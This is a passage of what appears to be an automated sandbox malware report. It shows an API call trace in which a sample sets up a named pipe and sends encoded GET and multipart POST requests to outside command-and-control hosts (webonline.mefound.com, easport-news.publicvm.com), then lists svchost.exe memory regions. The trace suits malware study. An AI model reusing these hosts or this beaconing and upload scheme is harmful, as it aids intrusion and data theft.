(hModule=0x76600000, lpProcName="InternetConnectA") returned 0x766249e9 [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="InternetReadFile") returned 0x7661b406 [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="InternetWriteFile") returned 0x766346da [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="HttpOpenRequestA") returned 0x76624c7d [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="HttpEndRequestA") returned 0x766345ea [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="HttpAddRequestHeadersA") returned 0x7661dcd2 [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestA") returned 0x766918f8 [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="InternetOpenA") returned 0x7662f18e [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="InternetCloseHandle") returned 0x7661ab49 [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="InternetQueryOptionA") returned 0x76611b56 [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="InternetSetOptionA") returned 0x766175e8 [0053.589] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x77830000 [0053.589] GetProcAddress (hModule=0x77830000, lpProcName="ObtainUserAgentString") returned 0x77861d76 [0053.589] GetComputerNameW (in: lpBuffer=0x52f7f4, nSize=0x52fa18 | out: lpBuffer="CRH2YWU7", nSize=0x52fa18) returned 1 [0053.590] _snwprintf (in: _Dest=0x52fa50, _Count=0x104, _Format="\\\\.\\pipe\\%08x" | out: _Dest="\\\\.\\pipe\\c41b2304") returned 17 [0053.590] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x64 [0053.590] CreateNamedPipeW (lpName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwOpenMode=0x40000003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x200, nInBufferSize=0x200, nDefaultTimeOut=0x3e8, lpSecurityAttributes=0x0) returned 0x60 [0053.590] GetComputerNameW (in: lpBuffer=0x52f804, nSize=0x52fa18 | out: lpBuffer="CRH2YWU7", nSize=0x52fa18) returned 1 [0053.590] _snwprintf (in: _Dest=0x52fc58, _Count=0x104, _Format="%08x" | out: _Dest="c41b2305") returned 8 [0053.590] OpenEventW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="c41b2305") returned 0x68 [0053.590] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x3e1230 | out: lpOverlapped=0x3e1230) returned 0 [0053.590] GetLastError () returned 0x3e5 [0053.590] SetEvent (hEvent=0x68) returned 1 [0053.604] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0053.604] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3e1230, lpNumberOfBytesTransferred=0x52fa4c, bWait=0 | out: lpNumberOfBytesTransferred=0x52fa4c) returned 1 [0053.604] ResetEvent (hEvent=0x68) returned 1 [0053.605] ReadFile (in: hFile=0x60, lpBuffer=0x51fa14, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x52fa18, lpOverlapped=0x3e1230 | out: lpBuffer=0x51fa14*, lpNumberOfBytesRead=0x52fa18*=0x8a, lpOverlapped=0x3e1230) returned 1 [0053.605] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0053.605] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3e1230, lpNumberOfBytesTransferred=0x52fa18, bWait=0 | out: lpNumberOfBytesTransferred=0x52fa18) returned 1 [0053.606] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x52b18c, cbSize=0x52b98c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x52b98c) returned 0x0 [0053.611] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0053.683] InternetConnectA (hInternet=0xcc0004, lpszServerName="webonline.mefound.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0053.683] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x52b990 | out: lpBuffer=0x0, lpdwBufferLength=0x52b990) returned 0 [0053.684] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x3ef940, lpdwBufferLength=0x52b990 | out: lpBuffer=0x3ef940, lpdwBufferLength=0x52b990) returned 1 [0053.684] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="index/index.php?h=TQz6H5GI8zI%3d&d=TQz%2f%2fCqWZDJNDfUup77CB3U%2bzyihu8MGfTz6H5GI8zJNDPofkYh%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0053.685] SetLastError (dwErrCode=0x0) [0053.685] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x52f9d8, dwBufferLength=0x4) returned 1 [0053.685] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x52f9d8, dwBufferLength=0x4) returned 1 [0053.685] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x52f9d8, dwBufferLength=0x4) returned 1 [0053.685] strlen (_Str="Accept: */*") returned 0xb [0053.685] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*", dwHeadersLength=0xb, dwModifiers=0x20000000) returned 1 [0053.686] SetLastError (dwErrCode=0x0) [0053.686] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0066.668] GetLastError () returned 0x0 [0066.668] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x52f9b0, lpdwBufferLength=0x52f9ac, lpdwIndex=0x0 | out: lpBuffer=0x52f9b0*, lpdwBufferLength=0x52f9ac*=0x4, lpdwIndex=0x0) returned 1 [0066.668] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0066.668] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0066.668] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0066.668] WriteFile (in: hFile=0x60, lpBuffer=0x1e60ac0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x52f9bc, lpOverlapped=0x3e1230 | out: lpBuffer=0x1e60ac0*, lpNumberOfBytesWritten=0x52f9bc*=0xd, lpOverlapped=0x3e1230) returned 1 [0066.668] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0066.668] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x3e1230 | out: lpOverlapped=0x3e1230) returned 0 [0066.668] GetLastError () returned 0x3e5 [0066.668] SetEvent (hEvent=0x68) returned 1 [0066.668] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0068.475] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3e1230, lpNumberOfBytesTransferred=0x52fa4c, bWait=0 | out: lpNumberOfBytesTransferred=0x52fa4c) returned 1 [0068.475] ResetEvent (hEvent=0x68) returned 1 [0068.476] ReadFile (in: hFile=0x60, lpBuffer=0x51fa14, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x52fa18, lpOverlapped=0x3e1230 | out: lpBuffer=0x51fa14, lpNumberOfBytesRead=0x52fa18*=0x0, lpOverlapped=0x3e1230) returned 0 [0068.476] GetLastError () returned 0x3e5 [0068.476] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0068.478] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3e1230, lpNumberOfBytesTransferred=0x52fa18, bWait=0 | out: lpNumberOfBytesTransferred=0x52fa18) returned 1 [0068.478] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x52ab24, cbSize=0x52b324 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x52b324) returned 0x0 [0068.478] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0068.478] InternetConnectA (hInternet=0xcc0004, lpszServerName="easport-news.publicvm.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0068.478] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x52b328 | out: lpBuffer=0x0, lpdwBufferLength=0x52b328) returned 0 [0068.478] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x1e60ac0, lpdwBufferLength=0x52b328 | out: lpBuffer=0x1e60ac0, lpdwBufferLength=0x52b328) returned 1 [0068.478] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="index/index.php?h=LIFUEDEFV6c%3d&d=LoFR84obwKcsgFshBzNmkhSzYScBNmeTHLFUEDEFV6csgVQQMQVmkRqwYSgDMGCXH7FgIAFBZpYdtWQhAzxnkwLrJHcRJXeHDKF0MBEld4cMoXQwESV3h8%3d%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0068.478] SetLastError (dwErrCode=0x0) [0068.478] GetSystemTime (in: lpSystemTime=0x52f8d8 | out: lpSystemTime=0x52f8d8*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xd, wMinute=0x7, wSecond=0x1, wMilliseconds=0x99)) [0068.478] srand (_Seed=0x99) [0068.478] rand () returned 538 [0068.478] rand () returned 13825 [0068.478] rand () returned 1944 [0068.478] rand () returned 14108 [0068.478] sprintf (in: _Dest=0x52f87c, _Format="---------------------------%x%x%x%x" | out: _Dest="---------------------------371c798360121a") returned 41 [0068.479] sprintf (in: _Dest=0x52f748, _Format="Content-Type: multipart/form-data; boundary=%s\r\n" | out: _Dest="Content-Type: multipart/form-data; boundary=---------------------------371c798360121a\r\n") returned 87 [0068.479] strlen (_Str="Content-Type: multipart/form-data; boundary=---------------------------371c798360121a\r\n") returned 0x57 [0068.479] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=---------------------------371c798360121a\r\n", dwHeadersLength=0x57, dwModifiers=0x20000000) returned 1 [0068.479] SetLastError (dwErrCode=0x0) [0068.479] sprintf (in: _Dest=0x52f348, _Format="--%s\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n" | out: _Dest="-----------------------------371c798360121a\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 133 [0068.479] sprintf (in: _Dest=0x52f548, _Format="\r\n--%s--\r\n" | out: _Dest="\r\n-----------------------------371c798360121a--\r\n") returned 49 [0068.479] strlen (_Str="\r\n-----------------------------371c798360121a--\r\n") returned 0x31 [0068.479] strlen (_Str="-----------------------------371c798360121a\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x85 [0068.479] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x52f9c8, dwBufferLength=0x4) returned 1 [0068.479] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x52f9c8, dwBufferLength=0x4) returned 1 [0068.479] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x52f9c8, dwBufferLength=0x4) returned 1 [0068.479] HttpSendRequestExA (in: hRequest=0xcc000c, lpBuffersIn=0x52f8b0, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0069.144] strlen (_Str="-----------------------------371c798360121a\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x85 [0069.144] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x52f348*, dwNumberOfBytesToWrite=0x85, lpdwNumberOfBytesWritten=0x52f9cc | out: lpBuffer=0x52f348*, lpdwNumberOfBytesWritten=0x52f9cc*=0x85) returned 1 [0069.145] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x1e60fa9*, dwNumberOfBytesToWrite=0xfa4, lpdwNumberOfBytesWritten=0x52f9cc | out: lpBuffer=0x1e60fa9*, lpdwNumberOfBytesWritten=0x52f9cc*=0xfa4) returned 1 [0069.145] strlen (_Str="\r\n-----------------------------371c798360121a--\r\n") returned 0x31 [0069.145] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x52f548*, dwNumberOfBytesToWrite=0x31, lpdwNumberOfBytesWritten=0x52f9cc | out: lpBuffer=0x52f548*, lpdwNumberOfBytesWritten=0x52f9cc*=0x31) returned 1 [0069.145] HttpEndRequestA (in: hRequest=0xcc000c, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0070.200] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x52f8ec, lpdwBufferLength=0x52f8e8, lpdwIndex=0x0 | out: lpBuffer=0x52f8ec*, lpdwBufferLength=0x52f8e8*=0x4, lpdwIndex=0x0) returned 1 [0070.200] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x52f8ec, lpdwBufferLength=0x52f8e8, lpdwIndex=0x0 | out: lpBuffer=0x52f8ec*, lpdwBufferLength=0x52f8e8*=0x4, lpdwIndex=0x0) returned 1 [0070.201] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52b348, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x52f9cc | out: lpBuffer=0x52b348*, lpdwNumberOfBytesRead=0x52f9cc*=0x130) returned 1 [0070.201] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52b348, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x52f9cc | out: lpBuffer=0x52b348*, lpdwNumberOfBytesRead=0x52f9cc*=0x0) returned 1 [0070.201] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0070.201] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0070.201] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0070.201] WriteFile (in: hFile=0x60, lpBuffer=0x1e61f58*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x52f9c0, lpOverlapped=0x3e1230 | out: lpBuffer=0x1e61f58*, lpNumberOfBytesWritten=0x52f9c0*=0x134, lpOverlapped=0x3e1230) returned 1 [0070.201] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0070.201] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x3e1230 | out: lpOverlapped=0x3e1230) returned 0 [0070.201] GetLastError () returned 0x3e5 [0070.201] SetEvent (hEvent=0x68) returned 1 [0070.201] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0070.208] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3e1230, lpNumberOfBytesTransferred=0x52fa4c, bWait=0 | out: lpNumberOfBytesTransferred=0x52fa4c) returned 1 [0070.208] ResetEvent (hEvent=0x68) returned 1 [0070.208] ReadFile (in: hFile=0x60, lpBuffer=0x51fa14, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x52fa18, lpOverlapped=0x3e1230 | out: lpBuffer=0x51fa14*, lpNumberOfBytesRead=0x52fa18*=0x8, lpOverlapped=0x3e1230) returned 1 [0070.208] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0070.208] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3e1230, lpNumberOfBytesTransferred=0x52fa18, bWait=0 | out: lpNumberOfBytesTransferred=0x52fa18) returned 1 [0070.208] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0070.208] ExitProcess (uExitCode=0x0) Thread: id = 169 os_tid = 0xee4 Thread: id = 170 os_tid = 0xee8 Thread: id = 171 os_tid = 0xeec Thread: id = 172 os_tid = 0xef0 Thread: id = 173 os_tid = 0xef4 Thread: id = 174 os_tid = 0xef8 Thread: id = 193 os_tid = 0xf2c Process: id = "75" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ef4f200" os_pid = "0x3f4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "74" os_parent_pid = "0xed8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cb7c" [0xc000000f], "LOCAL" [0x7] Region: id = 3370 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3371 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3372 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3373 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3374 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3375 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3376 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3377 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3378 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3379 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3380 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3381 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3382 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x1d0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3383 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3384 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 3385 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3386 start_va = 0x4c0000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3387 start_va = 0x540000 end_va = 0x543fff entry_point = 0x540000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3388 start_va = 0x550000 end_va = 0x551fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 3389 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3390 start_va = 0x570000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 3391 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3392 start_va = 0x5c0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3393 start_va = 0x6a0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3394 start_va = 0x700000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3395 start_va = 0x770000 end_va = 0x777fff entry_point = 0x770000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3396 start_va = 0x780000 end_va = 0xb72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3397 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 3398 start_va = 0xc00000 end_va = 0xecefff entry_point = 0xc00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3399 start_va = 0xf10000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 3400 start_va = 0xf60000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 3401 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 3402 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 3403 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3404 start_va = 0x1100000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3405 start_va = 0x1150000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3406 start_va = 0x1190000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 3407 start_va = 0x12e0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 3408 start_va = 0x12f0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 3409 start_va = 0x1440000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 3410 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 3411 start_va = 0x1510000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 3412 start_va = 0x1570000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 3413 start_va = 0x15b0000 end_va = 0x166ffff entry_point = 0x15b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3414 start_va = 0x16b0000 end_va = 0x16effff entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 3415 start_va = 0x1700000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 3416 start_va = 0x1740000 end_va = 0x177ffff entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 3417 start_va = 0x1790000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x0000000001790000" filename = "" Region: id = 3418 start_va = 0x1990000 end_va = 0x19cffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 3419 start_va = 0x1bc0000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 3420 start_va = 0x6ed40000 end_va = 0x6ed4cfff entry_point = 0x6ed40000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 3421 start_va = 0x6ed50000 end_va = 0x6ed52fff entry_point = 0x6ed50000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 3422 start_va = 0x6ed60000 end_va = 0x6ed71fff entry_point = 0x6ed60000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 3423 start_va = 0x6ed80000 end_va = 0x6ee0ffff entry_point = 0x6ed80000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 3424 start_va = 0x6efd0000 end_va = 0x6efd7fff entry_point = 0x6efd0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3425 start_va = 0x6f850000 end_va = 0x6f855fff entry_point = 0x6f850000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3426 start_va = 0x6fcb0000 end_va = 0x6fd10fff entry_point = 0x6fcb0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 3427 start_va = 0x70600000 end_va = 0x70659fff entry_point = 0x70600000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3428 start_va = 0x71f20000 end_va = 0x71f6bfff entry_point = 0x71f20000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3429 start_va = 0x723d0000 end_va = 0x7241efff entry_point = 0x723d0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3430 start_va = 0x72420000 end_va = 0x72477fff entry_point = 0x72420000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3431 start_va = 0x72690000 end_va = 0x726a4fff entry_point = 0x72690000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 3432 start_va = 0x72f40000 end_va = 0x72f6dfff entry_point = 0x72f40000 region_type = mapped_file name = "fthsvc.dll" filename = "\\Windows\\System32\\fthsvc.dll" (normalized: "c:\\windows\\system32\\fthsvc.dll") Region: id = 3433 start_va = 0x73fc0000 end_va = 0x73fd1fff entry_point = 0x73fc0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3434 start_va = 0x73fe0000 end_va = 0x74017fff entry_point = 0x73fe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3435 start_va = 0x74030000 end_va = 0x7403cfff entry_point = 0x74030000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3436 start_va = 